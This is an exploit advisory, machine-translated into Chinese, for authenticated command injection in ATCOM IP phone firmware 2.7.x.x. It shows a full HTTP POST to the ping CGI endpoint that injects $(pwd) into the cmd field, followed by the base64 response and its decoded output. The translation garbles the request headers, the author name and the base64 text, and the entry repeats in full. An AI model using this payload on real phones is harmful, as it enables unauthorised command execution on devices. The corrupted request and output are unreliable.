#利用标题: ATCOM 2.7.x.x-验证命令注入
#Google Dork: N/A
#日期: 07/09/2023
#利用作者:穆罕默德马云惹不起马云阿德尔
#供应商homepage: https://www.atcom.cn/
#软件link:
#版本:以上的所有版本2.7.x.x
#在: Kali Linux上测试
利用请求:
post/cgi-bin/web_cgi_main.cgi?user_get_phone_ping http/1.1
host: {target_ip}
用户代理:极性
content-type:应用程序/x-www-form-urlenCoded; charset=UTF-8
X-重新要求- WITH: XMLHTTPREQUEST
内容长度: 49
授权:摘要用户名='admin',ronm='ip Phone Web
配置',nonce='value_here',
uri='/cgi-bin/web_cgi_main.cgi?user_get_phone_ping',
响应='value_here',qop=auth,nc=value_here,cnonce='value_here'
CMD=0.0.0.0 $(PWD)IPV4_IPV6=0USER_GET_PHONE_PING
响应:
{'ping_cmd_result':'cgluzzogymfkigfkzhjlc3mgjzaumc4wljavdxnyl2xvy2 fsl2fwcc9sawdodhrwzc93d3cvy2dplwjpbick','ping_cmd':'0.0.0.0.0.0.0 $(pwd)'}
“ ping_cmd_result”的值编码为base64。解码
“ ping_cmd_result”的值显示执行命令的结果
如下所示:
ping:坏地址'0.0.0.0/usr/local/app/lighttpd/www/cgi-bin'
#Google Dork: N/A
#日期: 07/09/2023
#利用作者:穆罕默德马云惹不起马云阿德尔
#供应商homepage: https://www.atcom.cn/
#软件link:
#版本:以上的所有版本2.7.x.x
#在: Kali Linux上测试
利用请求:
post/cgi-bin/web_cgi_main.cgi?user_get_phone_ping http/1.1
host: {target_ip}
用户代理:极性
content-type:应用程序/x-www-form-urlenCoded; charset=UTF-8
X-重新要求- WITH: XMLHTTPREQUEST
内容长度: 49
授权:摘要用户名='admin',ronm='ip Phone Web
配置',nonce='value_here',
uri='/cgi-bin/web_cgi_main.cgi?user_get_phone_ping',
响应='value_here',qop=auth,nc=value_here,cnonce='value_here'
CMD=0.0.0.0 $(PWD)IPV4_IPV6=0USER_GET_PHONE_PING
响应:
{'ping_cmd_result':'cgluzzogymfkigfkzhjlc3mgjzaumc4wljavdxnyl2xvy2 fsl2fwcc9sawdodhrwzc93d3cvy2dplwjpbick','ping_cmd':'0.0.0.0.0.0.0 $(pwd)'}
“ ping_cmd_result”的值编码为base64。解码
“ ping_cmd_result”的值显示执行命令的结果
如下所示:
ping:坏地址'0.0.0.0/usr/local/app/lighttpd/www/cgi-bin'